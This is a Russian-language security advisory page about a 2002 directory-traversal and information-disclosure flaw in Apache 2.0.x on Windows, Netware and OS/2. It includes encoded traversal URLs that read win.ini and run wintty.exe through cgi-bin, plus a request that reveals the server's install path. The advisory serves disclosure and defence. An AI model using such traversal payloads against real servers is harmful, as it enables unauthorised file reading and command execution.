Доступ к произвольным файлам и выполнение произвольных команд в apache 2.0.x

Дата публикации:
17.08.2002
Всего просмотров:
869
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: В apache 2.0.x для Win/Netware/OS2 обнаружена возможность обхода каталога и раскрытие информации.
  1. Обход основного каталога:

    В apache не фильтруется символ '\' == %5c, который может использоваться как разделитель пути ((Windows, Netware, OS2 и другие). Уязвимость позволяет просмотреть содержание произвольных файлов и может использоваться для выполнения произвольных команд, через /cgi-bin/.

    Пример:

    1. Просматривает win.ini:
      http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini

    2. Запускает утилиту wintty:
      http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELL

  2. Раскрытие информации:

    Некорректный запрос к несуществующему var файлу, раскроет некоторую информацию о Web сервере (физическое расположение, версия и т.п.). Пример:

    На запрос http://127.0.0.1/error/HTTP_NOT_FOUND.html.var

    Сервер ответит:

    |Not Acceptable
    |
    |An appropriate representation of the requested resource 
    |/error/HTTP_NOT_FOUND.html.var could not be 
    found on this server. 
    |Available variants:
    |
    | * C:/server/Apache Group/Apache2/error/
    HTTP_NOT_FOUND.html.var, type 
    | text/html, language de
    | * C:/server/Apache Group/Apache2/error/
    HTTP_NOT_FOUND.html.var, type text/html, language en
    | * C:/server/Apache Group/Apache2/error/
    HTTP_NOT_FOUND.html.var, type text/html, language es
    | * C:/server/Apache Group/Apache2/error/
    HTTP_NOT_FOUND.html.var , type text/html, language fr
    
    
уязвимость обнаружена в 2.0.x до 2.0.39

Ссылки: Auriemma Luigi, PivX security advisory AL#001
или введите имя

CAPTCHA